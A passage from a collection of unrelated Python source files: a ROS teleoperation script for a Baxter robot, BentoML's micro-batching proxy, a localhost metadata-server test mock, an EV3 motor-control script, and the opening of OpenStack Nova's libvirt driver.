rospy.Subscriber("/robot/limb/right/endpoint_state", PoseStamped, self.right_end_callback)
rospy.Subscriber("/ar_pose_marker", AlvarMarkers, self.objects_pose_callback)
self._executed = True
print 'initialized'
def _time_stamp(self):
return rospy.get_time() - self._start_time
def try_float(self, x):
try:
return float(x)
except ValueError:
return None
def execute(self, limb, pose):
# print pose[1:8]
pose[1:8] = self.transform_unity_to_baxter(pose[1:8])
# print self.transform_baxter_to_unity(pose[1:8])
if limb == 'left':
self._left_ik_solver.solve(pose[1:4], pose[4:8])
self._gripper_left_status = pose[0]
if self._gripper_left_status > .5 and pose[0] < .5:
self._gripper_left.close()
elif self._gripper_left_status < .5 and pose[0] > .5:
self._gripper_left.open()
if limb == 'right':
self._right_ik_solver.solve(pose[1:4], pose[4:8])
self._gripper_right_status = pose[0]
if self._gripper_right_status > .5 and pose[0] < .5:
self._gripper_right.close()
elif self._gripper_right_status < .5 and pose[0] > .5:
self._gripper_left.open()
self._executed = False
self._execution_start = rospy.get_time()
def pose_to_pos_and_ori(self, pose):
pos = numpy.array([pose.position.x, pose.position.y, pose.position.z])
al, be, ga = euler_from_quaternion(numpy.array([pose.orientation.x, pose.orientation.y, pose.orientation.z, pose.orientation.w]))
ori = numpy.array([al, be, ga])
return (pos, ori)
def pos_and_ori_to_pose(self, pos, ori):
pose = Pose()
pose.position.x = pos[0]; pose.position.y = pos[1]; pose.position.z = pos[2]
pose.orientation.x = ori[0]; pose.orientation.y = ori[1]; pose.orientation.z = ori[2]; pose.orientation.w = ori[3]
return pose
def right_end_callback(self, state):
self._current_right_pose = state.pose
if(self._initial_right_pose.position.x == 0):
self._initial_right_pose = state.pose
def left_end_callback(self, state):
self._current_left_pose = state.pose
if(self._initial_left_pose.position.x == 0):
self._initial_left_pose = state.pose
def objects_pose_callback(self, state):
if len(state.markers) > 0:
self._objects_pose = [None] * len(state.markers)
for i in range(len(state.markers)):
self._objects_pose[i] = state.markers[i].pose.pose
def pose_to_array(self, pose):
return np.array([pose.position.x, pose.position.y, pose.position.z, pose.orientation.x, pose.orientation.y, pose.orientation.z, pose.orientation.w])
def transform_unity_to_baxter(self, unity_pose):
# transorm end-effector position
# unity: x = backward, y = up, z = right
# baxter: x = forward, y = left, z = up
baxter_pose = copy.copy(unity_pose)
unity_pose[0:3] /= 1.8
baxter_pose[0] = -unity_pose[0] + 1.3
baxter_pose[1] = -unity_pose[2] - .15
baxter_pose[2] = unity_pose[1] - .98
# transform end-effector orientation, it is calculated using trial and error, so, don't expect a understandable code here
baxter_pose[3] = unity_pose[6]
baxter_pose[4] = unity_pose[3]
baxter_pose[5] = unity_pose[4]
baxter_pose[6] = unity_pose[5]
ori_matrix = quaternion_matrix(baxter_pose[3:7])
angle, axis, point = rotation_from_matrix(ori_matrix)
axis[2] = -axis[2]
ori_matrix = rotation_matrix(-angle, axis)
rot_matrix = euler_matrix(1.57,0,0)
rot_matrix = euler_matrix(0,0,3.14).dot(rot_matrix)
rot_matrix = rot_matrix.dot(ori_matrix)
angle, axis, point = rotation_from_matrix(rot_matrix)
axis_0 = axis[0]
axis[0] = -axis[1]
axis[1] = axis_0
rot_matrix = rotation_matrix(angle, axis)
ori_quat = quaternion_from_matrix(rot_matrix)
baxter_pose[3] = ori_quat[1]
baxter_pose[4] = ori_quat[2]
baxter_pose[5] = ori_quat[3]
baxter_pose[6] = ori_quat[0]
return baxter_pose
def transform_baxter_to_unity(self, baxter_pose):
# unity: x = backward, y = up, z = right
# baxter: x = forward, y = left, z = up
unity_pose = copy.copy(baxter_pose)
unity_pose[0] = -baxter_pose[0] + 1.3
unity_pose[1] = baxter_pose[2] + .98
unity_pose[2] = -baxter_pose[1] - .15
unity_pose[0:3] *= 1.8
# transform end-effector orientation, it is calculated using trial and error, so, don't expect an understandable code here
unity_pose[3] = baxter_pose[4]
unity_pose[4] = baxter_pose[5]
unity_pose[5] = baxter_pose[6]
unity_pose[6] = baxter_pose[3]
ori_matrix = quaternion_matrix(unity_pose[3:7])
angle, axis, point = rotation_from_matrix(ori_matrix)
axis_0 = axis[0]
axis[0] = axis[1]
axis[1] = -axis_0
ori_matrix = rotation_matrix(angle, axis)
rot_matrix = euler_matrix(0,0,-3.14)
rot_matrix = euler_matrix(-1.57,0,0).dot(rot_matrix)
rot_matrix = ori_matrix.dot(rot_matrix)
angle, axis, point = rotation_from_matrix(rot_matrix)
axis[2] = -axis[2]
rot_matrix = rotation_matrix(-angle, axis)
ori_quat = quaternion_from_matrix(rot_matrix)
unity_pose[3] = ori_quat[1]
unity_pose[4] = ori_quat[2]
unity_pose[5] = ori_quat[3]
unity_pose[6] = ori_quat[0]
return unity_pose
def transform_kinect_to_unity(self, kinect_pose):
# unity: x = backward, y = up, z = right
# kinect: x = forward, y = left, z = up
unity_pose = copy.copy(kinect_pose)
unity_pose[0] = -kinect_pose[0] + 1.5
unity_pose[1] = kinect_pose[2] + .60
unity_pose[2] = -kinect_pose[1] + .05
unity_pose[0:3] *= 1.8
# transform end-effector orientation, it is calculated using trial and error, so, don't expect an understandable code here
unity_pose[3] = kinect_pose[4]
unity_pose[4] = kinect_pose[5]
unity_pose[5] = kinect_pose[6]
unity_pose[6] = kinect_pose[3]
ori_matrix = quaternion_matrix(unity_pose[3:7])
angle, axis, point = rotation_from_matrix(ori_matrix)
axis_0 = axis[0]
axis[0] = axis[1]
axis[1] = -axis_0
ori_matrix = rotation_matrix(angle, axis)
rot_matrix = euler_matrix(3.14,0,-3.14)
rot_matrix = euler_matrix(-1.57,0,0).dot(rot_matrix)
rot_matrix = ori_matrix.dot(rot_matrix)
angle, axis, point = rotation_from_matrix(rot_matrix)
axis_1 = axis[1]
axis[1] = axis[2]
axis[2] = axis_1
rot_matrix = rotation_matrix(-angle, axis)
ori_quat = quaternion_from_matrix(rot_matrix)
unity_pose[3] = ori_quat[1]
unity_pose[4] = ori_quat[2]
unity_pose[5] = ori_quat[3]
unity_pose[6] = ori_quat[0]
return unity_pose
def write_env_state(self, limb):
if hasattr(self, '_objects_pose'):
with open(self._filename, 'w') as f:
f.write('time,gripper,gripper_center_p_x,gripper_center_p_y,gripper_center_p_z,gripper_center_r_x,gripper_center_r_y,gripper_center_r_z,gripper_center_r_w,')
f.write('box (1)_p_x,box (1)_p_y,box (1)_p_z,box (1)_r_x,box (1)_r_y,box (1)_r_z,box (1)_r_w,')
f.write('task')
f.write('\n' + str(rospy.get_time()) + ',' + str(self._gripper_left_status if limb == 'left' else self._gripper_right_status) + ',')
if limb == 'left':
limb_pose_left = self.transform_baxter_to_unity(self.pose_to_array(self._current_left_pose))
f.write(','.join([str(x) for x in limb_pose_left]) + ',')
elif limb == 'right':
limb_pose_right = self.transform_baxter_to_unity(self.pose_to_array(self._current_right_pose))
f.write(','.join([str(x) for x in limb_pose_right]) + ',')
object_pose = self.transform_kinect_to_unity(self.pose_to_array(self._objects_pose[0]))
# print object_pose
# print np.array([1.439304,0.9475655,0.4852195, 0, 0, 0, 1])
f.write(','.join([str(x) for x in object_pose]) + ',')
# f.write('1.066,1,0.450393,0,0,0,1,')
f.write('18,')
else:
print 'No information about position of the objects.'
def difference_of_joints(self):
self._right_ik_solver.solution_to_execute = self._right_ik_solver.solution
self._left_ik_solver.solution_to_execute = self._left_ik_solver.solution
right_diff = 0; left_diff = 0
if self._right_ik_solver.foundSolution:
angles_right_nums = numpy.array([self._limb_right.joint_angle(j) for j in self._right_names])
solution_right = numpy.array(self._right_ik_solver.solution)
right_diff = numpy.linalg.norm(solution_right - angles_right_nums)*10.0
if right_diff < 10:
self._right_ik_solver.solution_to_execute = (angles_right_nums + (solution_right - angles_right_nums)/10.0).tolist()
else:
self._right_ik_solver.solution_to_execute = (angles_right_nums + (solution_right - angles_right_nums)/right_diff).tolist()
if self._left_ik_solver.foundSolution:
angles_left_nums = numpy.array([self._limb_left.joint_angle(j) for j in self._left_names])
solution_left = numpy.array(self._left_ik_solver.solution)
# print angles_left_nums, solution_left
left_diff = numpy.linalg.norm(solution_left - angles_left_nums)*10.0
if left_diff < 10:
self._left_ik_solver.solution_to_execute = (angles_left_nums + (solution_left - angles_left_nums)/10.0).tolist()
else:
self._left_ik_solver.solution_to_execute = (angles_left_nums + (solution_left - angles_left_nums)/left_diff).tolist()
# print right_diff, left_diff
if ( right_diff < 10 and left_diff < 10 ) or rospy.get_time() - self._execution_start > self._execution_timeout:
# print right_diff, left_diff
self._executed = True
# self.write_env_state()
def _update_thread(self):
rospy.loginfo("Starting Joint Update Thread:")
print 'Baxter execution thread started. '
while not rospy.is_shutdown() and not self._end_thread:
self.difference_of_joints()
if self._right_ik_solver.foundSolution:
right_angles = dict(zip(self._right_names[0:], self._right_ik_solver.solution_to_execute[0:]))
self._limb_right.set_joint_positions(right_angles)
if self._left_ik_solver.foundSolution:
left_angles = dict(zip(self._left_names[0:], self._left_ik_solver.solution_to_execute[0:]))
self._limb_left.set_joint_positions(left_angles)
# if self._right_ik_solver.foundSolution == False and self._left_ik_solver.foundSolution == False:
# print self._right_ik_solver.foundSolution, self._left_ik_solver.foundSolution
# if not self._right_ik_solver.foundSolution or not self._left_ik_solver.foundSolution:
# self._executed = True
self._rate.sleep()
rospy.loginfo("Stopped")
def main():
epilog = """
Related examples:
joint_position_file_playback.py; joint_trajectory_file_playback.py.
"""
arg_fmt = argparse.RawDescriptionHelpFormatter
parser = argparse.ArgumentParser(formatter_class=arg_fmt,
description=main.__doc__,
epilog=epilog)
parser.add_argument(
'-l', '--limb', default='right',
help='limb to move.'
)
parser.add_argument(
'-f', '--file', default='nofile', dest='filename',
help='the file name to read from'
)
args = parser.parse_args(rospy.myargv()[1:])
poseTojoints = PoseToJoints(args.filename, args.limb)
rospy.spin()
if __name__ == '__main__':
main()
|
marshal.py
|
# Copyright 2019 Atalaya Tech, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import functools
import logging
import multiprocessing
import time
import traceback
import aiohttp
import psutil
from dependency_injector.wiring import inject, Provide
from bentoml.configuration.containers import BentoMLContainer
from bentoml.exceptions import RemoteException
from bentoml.marshal.dispatcher import CorkDispatcher, NonBlockSema
from bentoml.marshal.utils import DataLoader
from bentoml.saved_bundle import load_bento_service_metadata
from bentoml.tracing.trace import async_trace, make_http_headers
from bentoml.types import HTTPRequest, HTTPResponse
logger = logging.getLogger(__name__)
def metrics_patch(cls):
class _MarshalService(cls):
@inject
def __init__(
self,
*args,
namespace: str = Provide[BentoMLContainer.config.instrument.namespace],
**kwargs,
):
for attr_name in functools.WRAPPER_ASSIGNMENTS:
try:
setattr(self.__class__, attr_name, getattr(cls, attr_name))
except AttributeError:
pass
from prometheus_client import Counter, Gauge, Histogram
super(_MarshalService, self).__init__(*args, **kwargs)
# its own namespace?
service_name = self.bento_service_metadata_pb.name
self.metrics_request_batch_size = Histogram(
name=service_name + '_mb_batch_size',
documentation=service_name + "microbatch request batch size",
namespace=namespace,
labelnames=['endpoint'],
)
self.metrics_request_duration = Histogram(
name=service_name + '_mb_requestmb_duration_seconds',
documentation=service_name + "API HTTP request duration in seconds",
namespace=namespace,
labelnames=['endpoint', 'http_response_code'],
)
self.metrics_request_in_progress = Gauge(
name=service_name + "_mb_request_in_progress",
documentation='Total number of HTTP requests in progress now',
namespace=namespace,
labelnames=['endpoint', 'http_method'],
)
self.metrics_request_exception = Counter(
name=service_name + "_mb_request_exception",
documentation='Total number of service exceptions',
namespace=namespace,
labelnames=['endpoint', 'exception_class'],
)
self.metrics_request_total = Counter(
name=service_name + "_mb_request_total",
documentation='Total number of service exceptions',
namespace=namespace,
labelnames=['endpoint', 'http_response_code'],
)
async def request_dispatcher(self, request):
func = super(_MarshalService, self).request_dispatcher
api_name = request.match_info.get("name", "/")
_metrics_request_in_progress = self.metrics_request_in_progress.labels(
endpoint=api_name, http_method=request.method,
)
_metrics_request_in_progress.inc()
time_st = time.time()
try:
resp = await func(request)
except asyncio.CancelledError:
resp = aiohttp.web.Response(status=503)
except Exception as e: # pylint: disable=broad-except
self.metrics_request_exception.labels(
endpoint=api_name, exception_class=e.__class__.__name__
).inc()
logger.error(traceback.format_exc())
resp = aiohttp.web.Response(status=500)
self.metrics_request_total.labels(
endpoint=api_name, http_response_code=resp.status
).inc()
self.metrics_request_duration.labels(
endpoint=api_name, http_response_code=resp.status
).observe(time.time() - time_st)
_metrics_request_in_progress.dec()
return resp
async def _batch_handler_template(self, requests, api_name):
func = super(_MarshalService, self)._batch_handler_template
self.metrics_request_batch_size.labels(endpoint=api_name).observe(
len(requests)
)
return await func(requests, api_name)
return _MarshalService
@metrics_patch
class MarshalService:
"""
MarshalService creates a reverse proxy server in front of actual API server,
implementing the micro batching feature.
It wait a short period and packed multiple requests in a single batch
before sending to the API server.
It applied an optimized CORK algorithm to get best efficiency.
"""
@inject
def __init__(
self,
bento_bundle_path,
outbound_host="localhost",
outbound_port=None,
outbound_workers=1,
mb_max_batch_size: int = None,
mb_max_latency: int = None,
request_header_flag: str = Provide[
BentoMLContainer.config.marshal_server.request_header_flag
],
max_request_size: int = Provide[
BentoMLContainer.config.api_server.max_request_size
],
zipkin_api_url: str = Provide[BentoMLContainer.config.tracing.zipkin_api_url],
):
self.outbound_host = outbound_host
self.outbound_port = outbound_port
self.outbound_workers = outbound_workers
self.mb_max_batch_size = mb_max_batch_size
self.mb_max_latency = mb_max_latency
self.batch_handlers = dict()
self._outbound_sema = None # the semaphore to limit outbound connections
self.request_header_flag = request_header_flag
self.max_request_size = max_request_size
self.zipkin_api_url = zipkin_api_url
self.bento_service_metadata_pb = load_bento_service_metadata(bento_bundle_path)
self.setup_routes_from_pb(self.bento_service_metadata_pb)
if psutil.POSIX:
import resource
self.CONNECTION_LIMIT = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
self.CONNECTION_LIMIT = 1024
logger.info(
"Your system nofile limit is %d, which means each instance of microbatch "
"service is able to hold this number of connections at same time. "
"You can increase the number of file descriptors for the server process, "
"or launch more microbatch instances to accept more concurrent connection.",
self.CONNECTION_LIMIT,
)
def set_outbound_port(self, outbound_port):
self.outbound_port = outbound_port
def fetch_sema(self):
if self._outbound_sema is None:
self._outbound_sema = NonBlockSema(self.outbound_workers)
return self._outbound_sema
def add_batch_handler(self, api_name, max_latency, max_batch_size):
'''
Params:
* max_latency: limit the max latency of overall request handling
* max_batch_size: limit the max batch size for handler
** marshal server will give priority to meet these limits than efficiency
'''
if api_name not in self.batch_handlers:
_func = CorkDispatcher(
max_latency,
max_batch_size,
shared_sema=self.fetch_sema(),
fallback=aiohttp.web.HTTPTooManyRequests,
)(functools.partial(self._batch_handler_template, api_name=api_name))
self.batch_handlers[api_name] = _func
def setup_routes_from_pb(self, bento_service_metadata_pb):
for api_pb in bento_service_metadata_pb.apis:
if api_pb.batch:
max_latency = api_pb.mb_max_latency or self.mb_max_latency
max_batch_size = api_pb.mb_max_batch_size or self.mb_max_batch_size
self.add_batch_handler(api_pb.name, max_latency, max_batch_size)
logger.info(
"Micro batch enabled for API `%s` max-latency: %s"
" max-batch-size %s",
api_pb.name,
max_latency,
max_batch_size,
)
async def request_dispatcher(self, request):
with async_trace(
self.zipkin_api_url,
service_name=self.__class__.__name__,
span_name="[1]http request",
is_root=True,
standalone=True,
sample_rate=0.001,
):
api_name = request.match_info.get("name")
if api_name in self.batch_handlers:
req = HTTPRequest(
tuple((k.decode(), v.decode()) for k, v in request.raw_headers),
await request.read(),
)
try:
resp = await self.batch_handlers[api_name](req)
except RemoteException as e:
# known remote exception
logger.error(traceback.format_exc())
resp = aiohttp.web.Response(
status=e.payload.status,
headers=e.payload.headers,
body=e.payload.body,
)
except Exception: # pylint: disable=broad-except
logger.error(traceback.format_exc())
resp = aiohttp.web.HTTPInternalServerError()
else:
resp = await self.relay_handler(request)
return resp
async def relay_handler(self, request):
data = await request.read()
headers = dict(request.headers)
url = request.url.with_host(self.outbound_host).with_port(self.outbound_port)
with async_trace(
self.zipkin_api_url,
service_name=self.__class__.__name__,
span_name=f"[2]{url.path} relay",
) as trace_ctx:
headers.update(make_http_headers(trace_ctx))
async with aiohttp.ClientSession(auto_decompress=False) as client:
async with client.request(
request.method, url, data=data, headers=request.headers
) as resp:
body = await resp.read()
return aiohttp.web.Response(
status=resp.status, body=body, headers=resp.headers,
)
async def _batch_handler_template(self, requests, api_name):
'''
batch request handler
params:
* requests: list of aiohttp request
* api_name: called API name
raise:
* RemoteException: known exceptions from model server
* Exception: other exceptions
'''
headers = {self.request_header_flag: "true"}
api_url = f"http://{self.outbound_host}:{self.outbound_port}/{api_name}"
with async_trace(
self.zipkin_api_url,
service_name=self.__class__.__name__,
span_name=f"[2]merged {api_name}",
) as trace_ctx:
headers.update(make_http_headers(trace_ctx))
reqs_s = DataLoader.merge_requests(requests)
try:
async with aiohttp.ClientSession(auto_decompress=False) as client:
async with client.post(
api_url, data=reqs_s, headers=headers
) as resp:
raw = await resp.read()
except aiohttp.client_exceptions.ClientConnectionError as e:
raise RemoteException(
e, payload=HTTPResponse(status=503, body=b"Service Unavailable")
)
if resp.status != 200:
raise RemoteException(
f"Bad response status from model server:\n{resp.status}\n{raw}",
payload=HTTPResponse(
status=resp.status,
headers=tuple(resp.headers.items()),
body=raw,
),
)
merged = DataLoader.split_responses(raw)
return tuple(
aiohttp.web.Response(
body=i.body, headers=i.headers, status=i.status or 500
)
for i in merged
)
def async_start(self, port):
"""
Start an micro batch server at the specific port on the instance or parameter.
"""
marshal_proc = multiprocessing.Process(
target=self.fork_start_app, kwargs=dict(port=port), daemon=True,
)
marshal_proc.start()
logger.info("Running micro batch service on :%d", port)
def make_app(self):
app = aiohttp.web.Application(client_max_size=self.max_request_size)
app.router.add_view("/", self.relay_handler)
app.router.add_view("/{name}", self.request_dispatcher)
app.router.add_view("/{path:.*}", self.relay_handler)
return app
def fork_start_app(self, port):
# Use new eventloop in the fork process to avoid problems on MacOS
# ref: https://groups.google.com/forum/#!topic/python-tornado/DkXjSNPCzsI
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
app = self.make_app()
aiohttp.web.run_app(app, port=port)
|
metadata_server_mock.py
|
import json
import threading
from http.server import ThreadingHTTPServer, BaseHTTPRequestHandler
_MDS_ADDRESS = ("localhost", 50052)
def metadata_server(token):
class MetadataHandler(BaseHTTPRequestHandler):
def do_GET(self):
data = _MDS_TOKEN = json.dumps({
"access_token": token,
"expires_in": 100,
"token_type": "Bearer"
}).encode("utf-8")
self.send_response(200)
self.send_header('Content-Length', len(data))
self.end_headers()
self.wfile.write(data)
srv = ThreadingHTTPServer(_MDS_ADDRESS, MetadataHandler)
thread = threading.Thread(target=srv.serve_forever)
thread.daemon = True
thread.start()
srv.addr = "{}:{}".format(_MDS_ADDRESS[0], _MDS_ADDRESS[1])
return srv
|
main.py
|
#!/usr/bin/env pybricks-micropython
import struct, threading
from pybricks import ev3brick as brick
from pybricks.ev3devices import (Motor, TouchSensor, ColorSensor, InfraredSensor, UltrasonicSensor, GyroSensor)
from pybricks.parameters import (Port, Stop, Direction, Button, Color, SoundFile, ImageFile, Align)
from pybricks.tools import print, wait, StopWatch
from pybricks.robotics import DriveBase
from devices import detectJoystick
class Robot():
def __init__(self):
self.motor = Motor(Port.B)
self.ultrasonic = UltrasonicSensor(Port.S4)
self.active = True
self.speed = 0
self.colors = [None, Color.GREEN, Color.YELLOW, Color.RED]
def setSpeed(self, acc):
if acc < 0:
self.speed = max(-3, self.speed - 1)
elif acc > 0:
self.speed = min(3, self.speed + 1)
else:
self.speed = 0
if self.speed != 0:
self.motor.run(self.speed * 90)
else:
self.motor.stop()
brick.light(self.colors[abs(self.speed)])
def inactive(self):
self.active = False
self.setSpeed(0)
brick.sound.beep()
def autoStopLoop(robot):
while robot.active:
if robot.speed > 0 and robot.ultrasonic.distance() < 200:
robot.setSpeed(0)
wait(100)
def joystickLoop(robot, eventFile):
FORMAT = 'llHHI'
EVENT_SIZE = struct.calcsize(FORMAT)
with open(eventFile, 'rb') as infile:
while True:
event = infile.read(EVENT_SIZE)
_, _, t, c, v = struct.unpack(FORMAT, event)
# button A, B:
if t == 1 and v == 1:
if c == 305:
# press A:
robot.setSpeed(1)
elif c == 304:
# press B:
robot.setSpeed(-1)
elif c == 307:
# press X:
return robot.inactive()
elif t == 3:
if c == 1:
# Left stick & vertical:
speed = 0
if v < 32768:
# up:
speed = 1
elif v > 32768:
# down:
speed = -1
robot.setSpeed(speed)
def buttonLoop(robot):
while True:
if not any(brick.buttons()):
wait(10)
else:
if Button.LEFT in brick.buttons():
robot.setSpeed(-1)
elif Button.RIGHT in brick.buttons():
robot.setSpeed(1)
elif Button.CENTER in brick.buttons():
robot.setSpeed(0)
elif Button.UP in brick.buttons():
return robot.inactive()
wait(500)
def main():
brick.sound.beep()
joystickEvent = detectJoystick(['Controller'])
robot = Robot()
t = threading.Thread(target=autoStopLoop, args=(robot,))
t.start()
if joystickEvent:
joystickLoop(robot, joystickEvent)
else:
buttonLoop(robot)
main()
|
driver.py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A connection to a hypervisor through libvirt.
Supports KVM, LXC, QEMU, UML, and XEN.
"""
import errno
import functools
import glob
import mmap
import os
import shutil
import socket
import sys
import tempfile
import threading
import time
import uuid
import eventlet
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from eventlet import util as eventlet_util
from lxml import etree
from oslo.config import cfg
import six
from nova.api.metadata import base as instance_metadata
from nova import block_device
from nova.compute import flavors
from nova.compute import power_state
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_mode
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova.i18n import _LI
from nova.i18n import _LW
from nova import image
from nova import objects
from nova.openstack.common import excutils
from nova.openstack.common import fileutils
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import loopingcall
from nova.openstack.common import processutils
from nova.openstack.common import timeutils
from nova.openstack.common import units
from nova.openstack.common import xmlutils
from nova.pci import pci_manager
from nova.pci import pci_utils
from nova.pci import pci_whitelist
from nova import rpc
from nova import utils
from nova import version
from nova.virt import block_device as driver_block_device
from nova.virt import configdrive
from nova.virt import diagnostics
from nova.virt.disk import api as disk
from nova.virt.disk.vfs import guestfs
from nova.virt import driver
from nova.virt import event as virtevent
from nova.virt import firewall
from nova.virt import hardware
from nova.virt.libvirt import blockinfo
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import firewall as libvirt_firewall
from nova.virt.libvirt import imagebackend
from nova.virt.libvirt import imagecache
from nova.virt.libvirt import lvm
from nova.virt.libvirt import rbd_utils
from nova.virt.libvirt import utils as libvirt_utils
from nova.virt.libvirt import vif as libvirt_vif
from nova.virt import netutils
from nova.virt import watchdog_actions
from nova import volume
from nova.volume import encryptors
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue")
libvirt = None
LOG = logging.getLogger(__name__)
libvirt_opts = [
cfg.StrOpt('rescue_image_id',
help='Rescue ami image. This will not be used if an image id '
'is provided by the user.'),
cfg.StrOpt('rescue_kernel_id',
help='Rescue aki image'),
cfg.StrOpt('rescue_ramdisk_id',
help='Rescue ari image'),
cfg.StrOpt('virt_type',
default='kvm',
help='Libvirt domain type (valid options are: '
'kvm, lxc, qemu, uml, xen)'),
cfg.StrOpt('connection_uri',
default='',
help='Override the default libvirt URI '
'(which is dependent on virt_type)'),
cfg.BoolOpt('inject_password',
default=False,
help='Inject the admin password at boot time, '
'without an agent.'),
cfg.BoolOpt('inject_key',
default=False,
help='Inject the ssh public key at boot time'),
cfg.IntOpt('inject_partition',
default=-2,
help='The partition to inject to : '
'-2 => disable, -1 => inspect (libguestfs only), '
'0 => not partitioned, >0 => partition number'),
cfg.BoolOpt('use_usb_tablet',
default=True,
help='Sync virtual and real mouse cursors in Windows VMs'),
cfg.StrOpt('live_migration_uri',
default="qemu+tcp://%s/system",
help='Migration target URI '
'(any included "%s" is replaced with '
'the migration target hostname)'),
cfg.StrOpt('live_migration_flag',
default='VIR_MIGRATE_UNDEFINE_SOURCE, VIR_MIGRATE_PEER2PEER, '
'VIR_MIGRATE_LIVE, VIR_MIGRATE_TUNNELLED',
help='Migration flags to be set for live migration'),
cfg.StrOpt('block_migration_flag',
default='VIR_MIGRATE_UNDEFINE_SOURCE, VIR_MIGRATE_PEER2PEER, '
'VIR_MIGRATE_LIVE, VIR_MIGRATE_TUNNELLED, '
'VIR_MIGRATE_NON_SHARED_INC',
help='Migration flags to be set for block migration'),
cfg.IntOpt('live_migration_bandwidth',
default=0,
help='Maximum bandwidth to be used during migration, in Mbps'),
cfg.StrOpt('snapshot_image_format',
help='Snapshot image format (valid options are : '
'raw, qcow2, vmdk, vdi). '
'Defaults to same as source image'),
cfg.ListOpt('volume_drivers',
default=[
'iscsi=nova.virt.libvirt.volume.LibvirtISCSIVolumeDriver',
'iser=nova.virt.libvirt.volume.LibvirtISERVolumeDriver',
'local=nova.virt.libvirt.volume.LibvirtVolumeDriver',
'fake=nova.virt.libvirt.volume.LibvirtFakeVolumeDriver',
'rbd=nova.virt.libvirt.volume.LibvirtNetVolumeDriver',
'sheepdog=nova.virt.libvirt.volume.LibvirtNetVolumeDriver',
'nfs=nova.virt.libvirt.volume.LibvirtNFSVolumeDriver',
'aoe=nova.virt.libvirt.volume.LibvirtAOEVolumeDriver',
'glusterfs='
'nova.virt.libvirt.volume.LibvirtGlusterfsVolumeDriver',
'fibre_channel=nova.virt.libvirt.volume.'
'LibvirtFibreChannelVolumeDriver',
'scality='
'nova.virt.libvirt.volume.LibvirtScalityVolumeDriver',
],
help='Libvirt handlers for remote volumes.'),
cfg.StrOpt('disk_prefix',
help='Override the default disk prefix for the devices attached'
' to a server, which is dependent on virt_type. '
'(valid options are: sd, xvd, uvd, vd)'),
cfg.IntOpt('wait_soft_reboot_seconds',
default=120,
help='Number of seconds to wait for instance to shut down after'
' soft reboot request is made. We fall back to hard reboot'
' if instance does not shutdown within this window.'),
cfg.StrOpt('cpu_mode',
help='Set to "host-model" to clone the host CPU feature flags; '
'to "host-passthrough" to use the host CPU model exactly; '
'to "custom" to use a named CPU model; '
'to "none" to not set any CPU model. '
'If virt_type="kvm|qemu", it will default to '
'"host-model", otherwise it will default to "none"'),
cfg.StrOpt('cpu_model',
help='Set to a named libvirt CPU model (see names listed '
'in /usr/share/libvirt/cpu_map.xml). Only has effect if '
'cpu_mode="custom" and virt_type="kvm|qemu"'),
cfg.StrOpt('snapshots_directory',
default='$instances_path/snapshots',
help='Location where libvirt driver will store snapshots '
'before uploading them to image service'),
cfg.StrOpt('xen_hvmloader_path',
default='/usr/lib/xen/boot/hvmloader',
help='Location where the Xen hvmloader is kept'),
cfg.ListOpt('disk_cachemodes',
default=[],
help='Specific cachemodes to use for different disk types '
'e.g: file=directsync,block=none'),
cfg.StrOpt('rng_dev_path',
help='A path to a device that will be used as source of '
'entropy on the host. Permitted options are: '
'/dev/random or /dev/hwrng'),
cfg.ListOpt('hw_machine_type',
help='For qemu or KVM guests, set this option to specify '
'a default machine type per host architecture. '
'You can find a list of supported machine types '
'in your environment by checking the output of '
'the "virsh capabilities"command. The format of the '
'value for this config option is host-arch=machine-type. '
'For example: x86_64=machinetype1,armv7l=machinetype2'),
cfg.StrOpt('sysinfo_serial',
default='auto',
help='The data source used to the populate the host "serial" '
'UUID exposed to guest in the virtual BIOS. Permitted '
'options are "hardware", "os", "none" or "auto" '
'(default).'),
]
CONF = cfg.CONF
CONF.register_opts(libvirt_opts, 'libvirt')
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('my_ip', 'nova.netconf')
CONF.import_opt('default_ephemeral_format', 'nova.virt.driver')
CONF.import_opt('use_cow_images', 'nova.virt.driver')
CONF.import_opt('live_migration_retry_count', 'nova.compute.manager')
CONF.import_opt('vncserver_proxyclient_address', 'nova.vnc')
CONF.import_opt('server_proxyclient_address', 'nova.spice', group='spice')
CONF.import_opt('vcpu_pin_set', 'nova.virt.hardware')
CONF.import_opt('vif_plugging_is_fatal', 'nova.virt.driver')
CONF.import_opt('vif_plugging_timeout', 'nova.virt.driver')
DEFAULT_FIREWALL_DRIVER = "%s.%s" % (
libvirt_firewall.__name__,
libvirt_firewall.IptablesFirewallDriver.__name__)
MAX_CONSOLE_BYTES = 100 * units.Ki
# The libvirt driver will prefix any disable reason codes with this string.
DISABLE_PREFIX = 'AUTO: '
# Disable reason for the service which was enabled or disabled without reason
DISABLE_REASON_UNDEFINED = 'None'
def patch_tpool_proxy():
"""eventlet.tpool.Proxy doesn't work with old-style class in __str__()
or __repr__() calls. See bug #962840 for details.
We perform a monkey patch to replace those two instance methods.
"""
def str_method(self):
return str(self._obj)
def repr_method(self):
return repr(self._obj)
